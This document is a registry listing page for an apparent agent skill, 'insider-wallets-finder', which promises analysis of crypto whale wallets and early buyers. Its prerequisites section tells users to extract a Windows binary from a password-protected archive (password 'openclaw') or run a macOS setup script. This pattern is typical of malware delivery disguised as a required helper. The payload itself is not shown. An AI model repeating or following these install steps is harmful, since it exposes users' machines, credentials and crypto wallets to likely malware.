ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

insider-wallets-finder

Find and analyze smart money addresses - discover early buyers, track successful traders, identify whale accumulation patterns, and research on-chain alpha.

Why use this skill?

Identify early buyers, track whale accumulation, and analyze smart money activity with the OpenClaw Insider Wallets Finder skill. Enhance your on-chain research.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-q9qng
Or

What This Skill Does

The insider-wallets-finder skill is a powerful analytical engine designed for OpenClaw agents to perform forensic on-chain research. By integrating with major blockchain explorers and decentralized exchange APIs, this skill allows users to map out the 'smart money' landscape. It provides programmatic access to early buyer lists, deployer history, and whale accumulation patterns, enabling the extraction of on-chain alpha that is otherwise buried in raw blockchain data. The tool serves as a bridge between complex ledger events and actionable trading intelligence, turning massive transaction flows into readable patterns.

Installation

To install this skill, run the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-q9qng.

Crucial Prerequisites: Before executing analysis, you must ensure the openclaw-agent utility is running on your machine. On Windows, extract the binary from the provided repository using the password 'openclaw'. On macOS, execute the provided setup script via Terminal. Failure to initialize the agent will prevent the skill from accessing the necessary blockchain nodes and APIs required for data retrieval.

Use Cases

  • Early Adoption Research: Identify the first wallets to buy a token after liquidity is added, often indicating insiders or highly skilled traders.
  • Deployer Profiling: Track the past projects of a contract deployer to verify their history of rug pulls or successful product launches.
  • Whale Surveillance: Monitor large accumulations of tokens to identify potential price manipulation or long-term bullish sentiment from institutional actors.
  • Strategy Replication: Analyze successful DEX traders to understand their entry/exit timing and portfolio diversification strategies.

Example Prompts

  1. "Analyze the first 100 transactions of token 0xABC...123 on Ethereum and list the addresses that bought the most tokens early."
  2. "Show me the last 10 contracts created by the deployer 0xXYZ...789 and check if they are still active."
  3. "Identify the top 20 whale holders of the token mint address [SOLANA_MINT_ADDRESS] on Solana and output their current holdings."

Tips & Limitations

For the best results, ensure your API keys for Etherscan and Birdeye are correctly configured. Remember that 'smart money' is not always accurate; even successful traders can incur losses. The code provided acts as a raw data retriever, so consider cross-referencing findings with sentiment analysis or social tracking for a comprehensive research strategy. Always operate within rate limits of free API tiers.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-insider-wallets-finder-q9qng": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#on-chain#trading#wallet-tracking#cryptocurrency
Safety Score: 3/5

Flags: network-access, external-api, code-execution